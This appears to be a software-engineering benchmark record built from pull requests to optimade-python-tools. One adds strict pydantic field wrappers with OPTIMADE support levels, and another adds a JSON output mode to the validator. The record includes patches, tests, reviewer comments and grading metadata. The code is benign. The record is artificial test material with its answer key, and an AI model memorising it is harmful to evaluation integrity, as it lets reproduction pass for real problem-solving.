@@ -885,6 +942,8 @@ class StructureResource(EntryResource): - **Examples**: - `"structures"`""", pattern="^structures$", + support=SupportLevel.MUST, + queryable=SupportLevel.MUST, ) attributes: StructureResourceAttributes diff --git a/optimade/models/utils.py b/optimade/models/utils.py index 8a32a7f8..7876dfd3 100644 --- a/optimade/models/utils.py +++ b/optimade/models/utils.py @@ -1,8 +1,116 @@ +import inspect +import warnings import re +from enum import Enum +from typing import Optional + +from pydantic import Field + +_PYDANTIC_FIELD_KWARGS = list(inspect.signature(Field).parameters.keys()) __all__ = ("CHEMICAL_SYMBOLS", "EXTRA_SYMBOLS", "ATOMIC_NUMBERS", "SemanticVersion") +class SupportLevel(Enum): + MUST = "must" + SHOULD = "should" + OPTIONAL = "optional" + + +def StrictField( + *args, + description: str = None, + **kwargs, +) -> Field: + """A wrapper around `pydantic.Field` that does the following: + + - Forbids any "extra" keys that would be passed to `pydantic.Field`, + except those used elsewhere to modify the schema in-place, + e.g. "uniqueItems", "pattern" and those added by OptimadeField, e.g. + "unit", "queryable" and "sortable". + - Emits a warning when no description is provided. + + Arguments: + *args: Positional arguments passed through to `Field`. + description: The description of the `Field`; if this is not + specified then a `UserWarning` will be emitted. + **kwargs: Extra keyword arguments to be passed to `Field`. + + Raises: + RuntimeError: If `**kwargs` contains a key not found in the + function signature of `Field`, or in the extensions used + by models in this package (see above). + + Returns: + The pydantic `Field`. + + """ + + allowed_keys = [ + "unit", + "pattern", + "uniqueItems", + "support", + "queryable", + "sortable", + ] + _banned = [k for k in kwargs if k not in set(_PYDANTIC_FIELD_KWARGS + allowed_keys)] + + if _banned: + raise RuntimeError( + f"Not creating StrictField({args}, {kwargs}) with forbidden keywords {_banned}." 
+ ) + + if description is not None: + kwargs["description"] = description + + if description is None: + warnings.warn( + f"No description provided for StrictField specified by {args}, {kwargs}." + ) + + return Field(*args, **kwargs) + + +def OptimadeField( + *args, + support: Optional[SupportLevel] = None, + queryable: Optional[SupportLevel] = None, + unit: Optional[str] = None, + **kwargs, +) -> Field: + """A wrapper around `pydantic.Field` that adds OPTIMADE-specific + field paramters `queryable`, `support` and `unit`, indicating + the corresponding support level in the specification and the + physical unit of the field. + + Arguments: + support: The support level of the field itself, i.e. whether the field + can be null or omitted by an implementation. + queryable: The support level corresponding to the queryablility + of this field. + unit: A string describing the unit of the field. + + Returns: + The pydantic field with extra validation provided by [`StrictField`][optimade.models.utils.StrictField]. + + """ + + # Collect non-null keyword arguments to add to the Field schema + if unit is not None: + kwargs["unit"] = unit + if queryable is not None: + if isinstance(queryable, str): + queryable = SupportLevel(queryable.lower()) + kwargs["queryable"] = queryable + if support is not None: + if isinstance(support, str): + support = SupportLevel(support.lower()) + kwargs["support"] = support + + return StrictField(*args, **kwargs) + + class SemanticVersion(str): """A custom type for a semantic version, using the recommended semver regexp from
SHOULD/MUST/OPTIONAL fields in models Following the discussion in #399, this PR is a place to try out ways of incorporating the "SHOULD" level of support for some fields in the specification. This PR does the following: - adds a couple of wrappers around pydantic's `Field` (namely `OptimadeField` and `StrictField`). - `StrictField` disallows keys outside of the pydantic `Field` signature, plus a couple of extras that we use (`unit`, `pattern` and `uniqueItems`), unfortunately. It emits a warning if a description is not supplied. Any tips on how to do this in a more pydantic way would be appreciated... - `OptimadeField` calls `StrictField` but also forces all fields to supply a `queryable` and a `support` attribute for all fields - ~switch away from `pattern=...` to `regex=...` inside `Field(...)` where possible so that regexes are applied automatically on validation.~ - fix a couple of fields that @CasperWA spotted elsewhere that have a typo `decsription` that means the schema never saw their descriptions... this is basically what `StrictField` will prevent in the future.
**Title** Enforce strict field definitions and add OPTIMADE support metadata across models **Problem** Model definitions used generic pydantic fields, allowing unintended keyword arguments, missing descriptions, and typographical errors that broke schema generation. The OPTIMADE specification’s “SHOULD/MUST/OPTIONAL” support levels were not represented, and the OpenAPI documentation lacked key descriptions for person objects. **Root Cause** Absence of a controlled wrapper for field creation caused lax validation and omission of required metadata, while the OpenAPI JSON omitted essential property descriptions. **Fix / Expected Behavior** - Introduce a strict field wrapper that validates allowed arguments and warns on missing descriptions. - Add an OPTIMADE‑specific field wrapper that records support and queryability levels for each property. - Replace all generic field definitions with the new wrappers, assigning appropriate support levels (MUST, SHOULD, OPTIONAL) and queryability flags. - Update the OpenAPI schema to include missing descriptions for person name and the person object itself. - Ensure all models now expose consistent metadata reflecting the OPTIMADE spec. **Risk & Validation** - Verify that model validation still succeeds and that existing endpoints return correctly typed responses. - Run the full test suite to catch regressions in serialization, validation, and OpenAPI generation. - Manually inspect the generated OpenAPI document to confirm the added descriptions and field metadata appear as intended.
453
Materials-Consortia/optimade-python-tools
diff --git a/tests/models/test_utils.py b/tests/models/test_utils.py new file mode 100644 index 00000000..279d4d68 --- /dev/null +++ b/tests/models/test_utils.py @@ -0,0 +1,76 @@ +import pytest +from pydantic import BaseModel +from optimade.models.utils import OptimadeField, StrictField, SupportLevel +from typing import List, Callable + + +def make_bad_models(field: Callable): + """Check that models using `field` to replace `Field` provide + appropriate warnings and errors. + + """ + with pytest.raises(RuntimeError, match="with forbidden keywords"): + + class BadModel(BaseModel): + bad_field: int = field(..., random_key="disallowed") + + with pytest.warns(UserWarning, match="No description"): + + class AnotherBadModel(BaseModel): + bad_field: int = field(...) + + +def test_strict_field(): + """Test `StrictField` creation for failure on bad keys, and + warnings with no description. + + """ + make_bad_models(StrictField) + + +def test_optimade_field(): + """Test `OptimadeField` creation for failure on bad keys, and + warnings with no description. + + """ + make_bad_models(OptimadeField) + + +def test_compatible_strict_optimade_field(): + """This test checks that OptimadeField and StrictField + produce the same schemas when given the same arguments. 
+ + """ + + class CorrectModelWithStrictField(BaseModel): + # check that unit and uniqueItems are passed through + good_field: List[str] = StrictField( + ..., + support=SupportLevel.MUST, + queryable=SupportLevel.OPTIONAL, + description="Unit test to make sure that StrictField allows through OptimadeField keys", + pattern="^structures$", + unit="stringiness", + uniqueItems=True, + sortable=True, + ) + + class CorrectModelWithOptimadeField(BaseModel): + + good_field: List[str] = OptimadeField( + ..., + # Only difference here is that OptimadeField allows case-insensitive + # strings to be passed instead of support levels directly + support="must", + queryable="optional", + description="Unit test to make sure that StrictField allows through OptimadeField keys", + pattern="^structures$", + uniqueItems=True, + unit="stringiness", + sortable=True, + ) + + optimade_schema = CorrectModelWithOptimadeField.schema() + strict_schema = CorrectModelWithStrictField.schema() + strict_schema["title"] = optimade_schema["title"] + assert strict_schema == optimade_schema
[ "tests/models/test_utils.py::test_strict_field", "tests/models/test_utils.py::test_optimade_field", "tests/models/test_utils.py::test_compatible_strict_optimade_field" ]
[]
Function: StrictField(*args, description: str = None, **kwargs) → Field Location: optimade.models.utils.StrictField Inputs: - *args: positional arguments forwarded to ``pydantic.Field`` (e.g., default value or Ellipsis). - description (optional str): description for the field; if omitted a ``UserWarning`` is emitted. - **kwargs: keyword arguments that must belong to the signature of ``pydantic.Field`` **or** the allowed extra keys ``unit``, ``pattern``, ``uniqueItems``, ``support``, ``queryable``, ``sortable``. Any other key triggers a ``RuntimeError``. Outputs: a ``pydantic.Field`` instance with the supplied arguments and the description (if given) attached. Description: A thin wrapper around ``pydantic.Field`` that validates that only permitted extra schema keywords are used, warns when a description is missing, and raises an error for any disallowed keyword. Function: OptimadeField(*args, support: SupportLevel | str = None, queryable: SupportLevel | str = None, unit: str = None, **kwargs) → Field Location: optimade.models.utils.OptimadeField Inputs: - *args: positional arguments forwarded to ``pydantic.Field`` (as in ``StrictField``). - support (optional): ``SupportLevel`` enum member or string (``"must"``, ``"should"``, ``"optional"``) indicating the field’s required support level. - queryable (optional): ``SupportLevel`` enum member or string indicating the queryability support level. - unit (optional str): textual description of the physical unit of the field. - **kwargs: any other keyword arguments accepted by ``pydantic.Field`` (validated by ``StrictField``). Outputs: a ``pydantic.Field`` instance created via ``StrictField`` with the additional ``support``, ``queryable`` and ``unit`` metadata attached when provided. Description: Extends ``StrictField`` by adding OPTIMADE‑specific metadata (support level, queryability, and unit) while preserving the same validation of allowed keywords. 
Enum: SupportLevel Location: optimade.models.utils.SupportLevel Inputs: No arguments (enum definition). Members: - MUST = "must" - SHOULD = "should" - OPTIONAL = "optional" Outputs: Enum members representing the three OPTIMADE support levels. Description: Enumeration used throughout the models to declare whether a field is required (MUST), recommended (SHOULD), or optional (OPTIONAL) in the specification; the test suite accesses the ``MUST`` and ``OPTIONAL`` members.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/models/test_utils.py" }
{ "num_modified_files": 11, "num_modified_lines": 519, "pr_author": "ml-evs", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.96, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue clearly specifies adding OptimadeField and StrictField wrappers, enforcing support levels, emitting warnings on missing descriptions, and rejecting unknown keywords, with a test suite that checks these behaviors and schema equivalence. The tests directly exercise the described functionality without external dependencies or unrelated expectations. No signals of B‑category problems are present.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, 
"test_sample_without_replacement": null } }
e05e0b806e5918ab30b0e8bcbc26b66d3927e306
2020-09-15 22:41:33
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/502?src=pr&el=h1) Report > Merging [#502](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/502?src=pr&el=desc) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/e05e0b806e5918ab30b0e8bcbc26b66d3927e306?el=desc) will **decrease** coverage by `0.02%`. > The diff coverage is `97.05%`. [![Impacted file tree graph](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/502/graphs/tree.svg?width=650&height=150&src=pr&token=UJAtmqkZZO)](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/502?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #502 +/- ## ========================================== - Coverage 91.58% 91.56% -0.03% ========================================== Files 61 61 Lines 3103 3106 +3 ========================================== + Hits 2842 2844 +2 - Misses 261 262 +1 ``` | Flag | Coverage Δ | | |---|---|---| | #project | `91.56% <97.05%> (-0.03%)` | :arrow_down: | | #validator | `?` | | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags#carryforward-flags-in-the-pull-request-comment) to find out more. 
| [Impacted Files](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/502?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [optimade/validator/\_\_init\_\_.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/502/diff?src=pr&el=tree#diff-b3B0aW1hZGUvdmFsaWRhdG9yL19faW5pdF9fLnB5) | `9.09% <0.00%> (-0.29%)` | :arrow_down: | | [optimade/validator/utils.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/502/diff?src=pr&el=tree#diff-b3B0aW1hZGUvdmFsaWRhdG9yL3V0aWxzLnB5) | `90.29% <100.00%> (+0.14%)` | :arrow_up: | | [optimade/validator/validator.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/502/diff?src=pr&el=tree#diff-b3B0aW1hZGUvdmFsaWRhdG9yL3ZhbGlkYXRvci5weQ==) | `82.18% <100.00%> (ø)` | | ------ [Continue to review full report at Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/502?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/502?src=pr&el=footer). Last update [e05e0b8...d0556bd](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/502?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments). ml-evs: Now we have the same problem as with the other PR, mkdocs can't handle `dataclasses` or `NamedTuple` :( CasperWA: > Now we have the same problem as with the other PR, mkdocs can't handle `dataclasses` or `NamedTuple` :( I wonder if there is a comment syntax (like `# pylint: disable=some-rule`) to exclude a class from MkDocs? 
Otherwise, we should contribute to MkDocs, or rather its doc-string parser :confused: CasperWA: > > Now we have the same problem as with the other PR, mkdocs can't handle `dataclasses` or `NamedTuple` :( > > I wonder if there is a comment syntax (like `# pylint: disable=some-rule`) to exclude a class from MkDocs? > Otherwise, we should contribute to MkDocs, or rather its doc-string parser confused Looking into the error from the CI run, it seems it is not MkDocs, but rather mkdocstrings. ml-evs: > > > Now we have the same problem as with the other PR, mkdocs can't handle `dataclasses` or `NamedTuple` :( > > > > > > I wonder if there is a comment syntax (like `# pylint: disable=some-rule`) to exclude a class from MkDocs? > > Otherwise, we should contribute to MkDocs, or rather its doc-string parser confused > > Looking into the error from the CI run, it seems it is not MkDocs, but rather mkdocstrings. Yeah sorry, that's what I mean every time I say mkdocs... this one seems weird, mkdocstrings is meant to support dataclasses and the error is to do with parsing the markdown `api_reference/validator/validator.md` :confused: CasperWA: > > > > Now we have the same problem as with the other PR, mkdocs can't handle `dataclasses` or `NamedTuple` :( > > > > > > > > > I wonder if there is a comment syntax (like `# pylint: disable=some-rule`) to exclude a class from MkDocs? > > > Otherwise, we should contribute to MkDocs, or rather its doc-string parser confused > > > > > > Looking into the error from the CI run, it seems it is not MkDocs, but rather mkdocstrings. > > Yeah sorry, that's what I mean every time I say mkdocs... 
this one seems weird, mkdocstrings is meant to support dataclasses and the error is to do with parsing the markdown `api_reference/validator/validator.md` confused So what it's doing (I'm guessing) is following the reference and using [`pytkdocs`](https://github.com/pawamoy/pytkdocs) to extract the docstrings, then it's converting this to XML, which is where it fails, because the generated XML file is badly made. ml-evs: > So what it's doing (I'm guessing) is following the reference (to `optimade/validator/validator.py`) and using [`pytkdocs`](https://github.com/pawamoy/pytkdocs) to extract the docstrings, then it's converting this to XML, which is where it fails, because the generated XML file is badly made. So it "works" if I remove the explicit `dataclass.field` fields, though it still returns warnings for `__eq__`, `__init__` and `__repr__`:
materials-consortia__optimade-python-tools-502
diff --git a/mkdocs.yml b/mkdocs.yml index e5d0a559..4dc0288e 100644 --- a/mkdocs.yml +++ b/mkdocs.yml @@ -63,6 +63,7 @@ plugins: - "!__json_encoder__$" - "!__all__$" - "!__config__$" + - "!ValidatorResults$" members: true inherited_members: false docstring_style: google diff --git a/optimade/validator/__init__.py b/optimade/validator/__init__.py index 42834b56..5ca6961f 100644 --- a/optimade/validator/__init__.py +++ b/optimade/validator/__init__.py @@ -45,6 +45,12 @@ def validate(): default=0, help="""Increase the verbosity of the output.""", ) + parser.add_argument( + "-j", + "--json", + action="store_true", + help="""Only a JSON summary of the validator results will be printed to stdout.""", + ) parser.add_argument( "-t", "--as-type", @@ -97,6 +103,7 @@ def validate(): validator = ImplementationValidator( base_url=args["base_url"], verbosity=args["verbosity"], + respond_json=args["json"], as_type=args["as_type"], index=args["index"], run_optional_tests=not args["skip_optional"], diff --git a/optimade/validator/utils.py b/optimade/validator/utils.py index 84102a68..6e890227 100644 --- a/optimade/validator/utils.py +++ b/optimade/validator/utils.py @@ -132,7 +132,6 @@ class Client: # pragma: no cover if status_code != 429: break - print("Hit rate limit, sleeping for 1 s...") time.sleep(1) else: @@ -242,19 +241,20 @@ def test_case(test_fn: Callable[[Any], Tuple[Any, str]]): if not isinstance(result, Exception): if not multistage: if not optional: - validator.success_count += 1 + validator.results.success_count += 1 else: - validator.optional_success_count += 1 + validator.results.optional_success_count += 1 message = f"✔: {request} - {msg}" if validator.verbosity > 0: if optional: print(message) else: print_success(message) - elif optional: - print(".", end="", flush=True) - else: - print_success(".", end="", flush=True) + elif validator.verbosity == 0: + if optional: + print(".", end="", flush=True) + else: + print_success(".", end="", flush=True) else: 
internal_error = False request = request.replace("\n", "") @@ -267,17 +267,21 @@ def test_case(test_fn: Callable[[Any], Tuple[Any, str]]): if isinstance(result, InternalError): internal_error = True - validator.internal_failure_count += 1 + validator.results.internal_failure_count += 1 summary = f"!: {request} - {test_fn.__name__} - failed with internal error" - validator.internal_failure_messages.append((summary, message)) + validator.results.internal_failure_messages.append( + (summary, message) + ) else: summary = f"✖: {request} - {test_fn.__name__} - failed with error" if not optional: - validator.failure_count += 1 - validator.failure_messages.append((summary, message)) + validator.results.failure_count += 1 + validator.results.failure_messages.append((summary, message)) else: - validator.optional_failure_count += 1 - validator.optional_failure_messages.append((summary, message)) + validator.results.optional_failure_count += 1 + validator.results.optional_failure_messages.append( + (summary, message) + ) if validator.verbosity > 0: if internal_error: @@ -292,7 +296,7 @@ def test_case(test_fn: Callable[[Any], Tuple[Any, str]]): print_failure(summary) for line in message: print_warning(f"\t{line}") - else: + elif validator.verbosity == 0: if internal_error: print_notify("!", end="", flush=True) elif optional: diff --git a/optimade/validator/validator.py b/optimade/validator/validator.py index 5fd18921..ed83be13 100644 --- a/optimade/validator/validator.py +++ b/optimade/validator/validator.py @@ -11,6 +11,7 @@ import sys import logging import random import urllib.parse +import dataclasses from typing import Union, Tuple, Any, List, Dict, Optional try: @@ -37,6 +38,24 @@ from optimade.validator.config import VALIDATOR_CONFIG as CONF VERSIONS_REGEXP = r"/v[0-9]+(\.[0-9]+){,2}" +__all__ = ("ImplementationValidator",) + + +@dataclasses.dataclass +class ValidatorResults: + success_count: int = 0 + failure_count: int = 0 + internal_failure_count: int = 0 + 
optional_success_count: int = 0 + optional_failure_count: int = 0 + failure_messages: List[Tuple[str, str]] = dataclasses.field(default_factory=list) + internal_failure_messages: List[Tuple[str, str]] = dataclasses.field( + default_factory=list + ) + optional_failure_messages: List[Tuple[str, str]] = dataclasses.field( + default_factory=list + ) + class ImplementationValidator: """Class used to make a series of checks against a particular @@ -63,6 +82,7 @@ class ImplementationValidator: client: Any = None, base_url: str = None, verbosity: int = 0, + respond_json: bool = False, page_limit: int = 5, max_retries: int = 5, run_optional_tests: bool = True, @@ -82,6 +102,8 @@ class ImplementationValidator: base of the OPTIMADE implementation. verbosity: The verbosity of the output and logging as an integer (`0`: critical, `1`: warning, `2`: info, `3`: debug). + respond_json: If `True`, print only a JSON representation of the + results of validation to stdout. page_limit: The default page limit to apply to filters. max_retries: Argument is passed to the client for how many attempts to make for a request before failing. @@ -101,6 +123,7 @@ class ImplementationValidator: self.index = index self.run_optional_tests = run_optional_tests self.fail_fast = fail_fast + self.respond_json = respond_json if as_type is None: self.as_type_cls = None @@ -147,14 +170,7 @@ class ImplementationValidator: self._test_id_by_type = {} self._entry_info_by_type = {} - self.success_count = 0 - self.failure_count = 0 - self.internal_failure_count = 0 - self.optional_success_count = 0 - self.optional_failure_count = 0 - self.failure_messages = [] - self.internal_failure_messages = [] - self.optional_failure_messages = [] + self.results = ValidatorResults() def _setup_log(self): """ Define stdout log based on given verbosity. 
""" @@ -164,7 +180,12 @@ class ImplementationValidator: stdout_handler.setFormatter( logging.Formatter("%(asctime)s - %(name)s | %(levelname)8s: %(message)s") ) - self._log.addHandler(stdout_handler) + + if not self.respond_json: + self._log.addHandler(stdout_handler) + else: + self.verbosity = -1 + if self.verbosity == 0: self._log.setLevel(logging.CRITICAL) elif self.verbosity == 1: @@ -176,23 +197,27 @@ class ImplementationValidator: def print_summary(self): """ Print a summary of the results of validation. """ - if self.failure_messages: + if self.respond_json: + print(json.dumps(dataclasses.asdict(self.results), indent=2)) + return + + if self.results.failure_messages: print("\n\nFAILURES") print("========\n") - for message in self.failure_messages: + for message in self.results.failure_messages: print_failure(message[0]) for line in message[1]: print_warning("\t" + line) - if self.optional_failure_messages: + if self.results.optional_failure_messages: print("\n\nOPTIONAL TEST FAILURES") print("======================\n") - for message in self.optional_failure_messages: + for message in self.results.optional_failure_messages: print_notify(message[0]) for line in message[1]: print_warning("\t" + line) - if self.internal_failure_messages: + if self.results.internal_failure_messages: print("\n\nINTERNAL FAILURES") print("=================\n") print( @@ -201,13 +226,13 @@ class ImplementationValidator: "https://github.com/Materials-Consortia/optimade-python-tools/issues/new.\n" ) - for message in self.internal_failure_messages: + for message in self.results.internal_failure_messages: print_warning(message[0]) for line in message[1]: print_warning("\t" + line) if self.valid or (not self.valid and not self.fail_fast): - final_message = f"\n\nPassed {self.success_count} out of {self.success_count + self.failure_count + self.internal_failure_count} tests." 
+ final_message = f"\n\nPassed {self.results.success_count} out of {self.results.success_count + self.results.failure_count + self.results.internal_failure_count} tests." if not self.valid: print_failure(final_message) else: @@ -215,8 +240,8 @@ class ImplementationValidator: if self.run_optional_tests and not self.fail_fast: print( - f"Additionally passed {self.optional_success_count} out of " - f"{self.optional_success_count + self.optional_failure_count} optional tests." + f"Additionally passed {self.results.optional_success_count} out of " + f"{self.results.optional_success_count + self.results.optional_failure_count} optional tests." ) def validate_implementation(self): @@ -238,11 +263,12 @@ class ImplementationValidator: self.as_type_cls, ) self._test_as_type() - self.valid = not bool(self.failure_count) + self.valid = not bool(self.results.failure_count) return # Test entire implementation - print(f"Testing entire implementation at {self.base_url}...") + if self.verbosity >= 0: + print(f"Testing entire implementation at {self.base_url}") info_endp = CONF.info_endpoint self._log.debug("Testing base info endpoint of %s", info_endp) @@ -297,7 +323,9 @@ class ImplementationValidator: self._log.debug("Testing %s endpoint", CONF.links_endpoint) self._test_info_or_links_endpoint(CONF.links_endpoint) - self.valid = not (self.failure_count or self.internal_failure_count) + self.valid = not ( + self.results.failure_count or self.results.internal_failure_count + ) self.print_summary() @@ -390,7 +418,7 @@ class ImplementationValidator: f"Some 'MUST' properties were missing from info/{endp}: {missing}" ) - return True, "Found all required properties in entry info for endpoint {endp}" + return True, f"Found all required properties in entry info for endpoint {endp}" @test_case def _get_archetypal_entry(self, endp: str) -> Tuple[Dict[str, Any], str]:
Enable JSON response from the validator This PR adds a `-j`/`--json` flag to the validator that lowers verbosity to "-1" and only prints a JSON representation of the results to stdout.
**Title** Add optional JSON‑only output for the validator and encapsulate validation results. **Problem** The validator always prints human‑readable summaries and mixes result counters with console output logic. There is no way to retrieve the validation outcome as pure JSON, which is needed for automated pipelines. **Root Cause** Result metrics and messages are stored as independent attributes on the validator, and the output routine does not support a mode that suppresses all non‑JSON text. **Fix / Expected Behavior** - Introduce a command‑line switch that makes the validator emit a single JSON document containing all counts and messages. - Bundle all validation statistics and messages into a dedicated result object, isolating them from logging and printing code. - When JSON mode is active, suppress all regular stdout logging and set verbosity to a neutral level. - Ensure the final summary respects the new result container, producing identical human‑readable output when the flag is not used. - Preserve existing functionality for interactive use while providing a clean machine‑readable output when requested. **Risk & Validation** - Verify that JSON output includes the full set of counts and failure details identical to the human‑readable summary. - Confirm that normal (non‑JSON) runs retain their previous output format and logging behavior. - Run the test suite and a few example validator executions with and without the flag to ensure no regression in result accuracy or exit codes.
502
Materials-Consortia/optimade-python-tools
diff --git a/tests/server/test_server_validation.py b/tests/server/test_server_validation.py index fbe35504..1548052c 100644 --- a/tests/server/test_server_validation.py +++ b/tests/server/test_server_validation.py @@ -1,4 +1,6 @@ import os +import json +import dataclasses from traceback import print_exc import pytest @@ -14,10 +16,32 @@ def test_with_validator(both_fake_remote_clients): index=both_fake_remote_clients.app == app, verbosity=5, ) - try: - validator.validate_implementation() - except Exception: - print_exc() + + validator.validate_implementation() + assert validator.valid + + +def test_with_validator_json_response(both_fake_remote_clients, capsys): + """ Test that the validator writes compliant JSON when requested. """ + from optimade.server.main_index import app + + validator = ImplementationValidator( + client=both_fake_remote_clients, + index=both_fake_remote_clients.app == app, + respond_json=True, + ) + validator.validate_implementation() + + captured = capsys.readouterr() + json_response = json.loads(captured.out) + assert json_response["failure_count"] == 0 + assert json_response["internal_failure_count"] == 0 + assert json_response["optional_failure_count"] == 0 + assert validator.results.failure_count == 0 + assert validator.results.internal_failure_count == 0 + assert validator.results.optional_failure_count == 0 + assert dataclasses.asdict(validator.results) == json_response + assert validator.valid diff --git a/tests/validator/test_utils.py b/tests/validator/test_utils.py index 12f0eba2..afce84f0 100644 --- a/tests/validator/test_utils.py +++ b/tests/validator/test_utils.py @@ -26,11 +26,11 @@ def test_normal_test_case(): validator = ImplementationValidator(base_url="http://example.org", verbosity=0) output = dummy_test_case(validator, ([1, 2, 3], "message"), request="test_request") - assert validator.success_count == 1 - assert validator.optional_success_count == 0 - assert validator.failure_count == 0 - assert 
validator.optional_failure_count == 0 - assert validator.internal_failure_count == 0 + assert validator.results.success_count == 1 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 0 + assert validator.results.optional_failure_count == 0 + assert validator.results.internal_failure_count == 0 assert output[0] == [1, 2, 3] assert output[1] == "message" @@ -42,11 +42,11 @@ def test_optional_test_case(): output = dummy_test_case( validator, ("string response", "message"), request="test_request", optional=True ) - assert validator.success_count == 0 - assert validator.optional_success_count == 1 - assert validator.failure_count == 0 - assert validator.optional_failure_count == 0 - assert validator.internal_failure_count == 0 + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 1 + assert validator.results.failure_count == 0 + assert validator.results.optional_failure_count == 0 + assert validator.results.internal_failure_count == 0 assert output[0] == "string response" assert output[1] == "message" @@ -57,11 +57,11 @@ def test_ignored_test_case(): # Test returns None, so should not increment success/failure output = dummy_test_case(validator, (None, "message"), request="test_request") - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 0 - assert validator.optional_failure_count == 0 - assert validator.internal_failure_count == 0 + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 0 + assert validator.results.optional_failure_count == 0 + assert validator.results.internal_failure_count == 0 assert output[0] is None assert output[1] == "message" @@ -77,11 +77,11 @@ def test_skip_optional_test_case(): output = dummy_test_case( validator, ({"test": "dict"}, "message"), request="test_request", optional=True ) - assert 
validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 0 - assert validator.optional_failure_count == 0 - assert validator.internal_failure_count == 0 + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 0 + assert validator.results.optional_failure_count == 0 + assert validator.results.internal_failure_count == 0 assert output[0] is None assert output[1] == "skipping optional" @@ -89,11 +89,11 @@ def test_skip_optional_test_case(): output = dummy_test_case( validator, ({"test": "dict"}, "message"), request="test_request", optional=False ) - assert validator.success_count == 1 - assert validator.optional_success_count == 0 - assert validator.failure_count == 0 - assert validator.optional_failure_count == 0 - assert validator.internal_failure_count == 0 + assert validator.results.success_count == 1 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 0 + assert validator.results.optional_failure_count == 0 + assert validator.results.internal_failure_count == 0 assert output[0] == {"test": "dict"} assert output[1] == "message" @@ -110,20 +110,20 @@ def test_expected_failure_test_case(): request="test_request", raise_exception=ResponseError("Dummy error"), ) - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 1 - assert validator.optional_failure_count == 0 - assert validator.internal_failure_count == 0 + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 1 + assert validator.results.optional_failure_count == 0 + assert validator.results.internal_failure_count == 0 assert output[0] is None assert output[1] == "ResponseError: Dummy error" assert ( - validator.failure_messages[-1][0] + 
validator.results.failure_messages[-1][0] == "✖: http://example.org/test_request - dummy_test_case - failed with error" ) - assert validator.failure_messages[-1][1] == ["ResponseError: Dummy error"] + assert validator.results.failure_messages[-1][1] == ["ResponseError: Dummy error"] output = dummy_test_case( validator, @@ -132,20 +132,22 @@ def test_expected_failure_test_case(): raise_exception=ResponseError("Dummy error"), optional=True, ) - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 1 - assert validator.optional_failure_count == 1 - assert validator.internal_failure_count == 0 + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 1 + assert validator.results.optional_failure_count == 1 + assert validator.results.internal_failure_count == 0 assert output[0] is None assert output[1] == "ResponseError: Dummy error" assert ( - validator.optional_failure_messages[-1][0] + validator.results.optional_failure_messages[-1][0] == "✖: http://example.org/test_request - dummy_test_case - failed with error" ) - assert validator.optional_failure_messages[-1][1] == ["ResponseError: Dummy error"] + assert validator.results.optional_failure_messages[-1][1] == [ + "ResponseError: Dummy error" + ] output = dummy_test_case( validator, @@ -154,11 +156,11 @@ def test_expected_failure_test_case(): raise_exception=json.JSONDecodeError("Dummy JSON error", "{}", 0), optional=True, ) - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 1 - assert validator.optional_failure_count == 2 - assert validator.internal_failure_count == 0 + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 1 + 